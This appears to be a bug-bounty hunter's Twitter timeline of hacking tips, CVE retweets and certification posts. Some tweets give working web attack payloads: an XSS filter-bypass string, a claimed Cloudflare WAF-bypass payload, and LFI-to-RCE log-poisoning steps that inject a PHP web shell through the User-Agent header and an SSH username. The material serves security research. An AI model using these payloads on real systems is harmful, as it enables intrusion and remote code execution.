| eJPT Certified | C|EH v11 Certified | CompTIA Security + Certified | -Check my writeup on Medium | Bug Hunter |

127.0.0.1
Joined June 2019
Pinned Tweet
My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs
0xJin retweeted
[New VM] Versteckt | Waiting for Friday? Still waiting while enjoy #hacking this VM made by our brother @bitc0de #hackmyvm #ctf #cybersecurity #pentesting #infosec hackmyvm.eu
0xJin retweeted
FYI: I know a LOT of people working in cybersecurity with 8+ years experience that don't have these skills:
- command line
- Windows internals
- vuln analysis/ threat sim
- pentest complex infra
- exploit dev
- reporting
- *executing* TTPs
- IT Risk
- scripting/coding
- tool dev
0xJin retweeted
Domain Lowering - A sophisticated attack for SOP bypass. Please let me know in the comments down below how do you like it. HD -> securityzines.com/flyers/dl.… #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #learn365 #bugbounty #bugbountytips #zines
0xJin retweeted
#bugbountytips #BugBounty CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal 1.Abstract 2.Proof of Concept 3. Fix More..bit.ly/3d8X9Rw
Researcher discloses details of an unpatched #vulnerability (CVE-2021-24084) in the Windows OS—known to #Microsoft since October 2020—that could allow an attacker to gain unauthorized access to the file system & read arbitrary files. Details: thehackernews.com/2021/11/un… #infosec
Best certifications for Jobs! #cybersecurity #Pentesting #hacking #hacker #bugbounty
0xJin retweeted
#bugbountytips #bugbounty CVE-2021–38314 #WordPress Unauthenticated Sensitive Information Disclosure More..bit.ly/3HYqTP4
0xJin retweeted
A payload that bypasses Cloudflare WAF, by @ex_mi <img/src=x onError="`${x}`;alert(`Ex.Mi`);">
Achieving LFI to RCE:-
1. Apache Log Poisoning
2. SSH Log Poisoning
3. SMTP Log Poisoning
4. Image Upload
5. /proc/self/environ
6. php://filter
7. Zip upload
And more.
Achieving LFI to RCE
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls
(1/n)
This is a curated list by @Hacker0x01 of Burp plugins! ActiveScan++ Autorepeater Burp Autorize Burp BurpSentinel Flow Headless Burp Logger++ WSDL Wizard #cybersecurity #bugbountytips #hacking #webappsec #webhacking #pentesting THREAD 👇
0xJin retweeted
#bugbountytip #bugbounty Command Injection via Obsolete PHPThumb More...bit.ly/3cVmZIk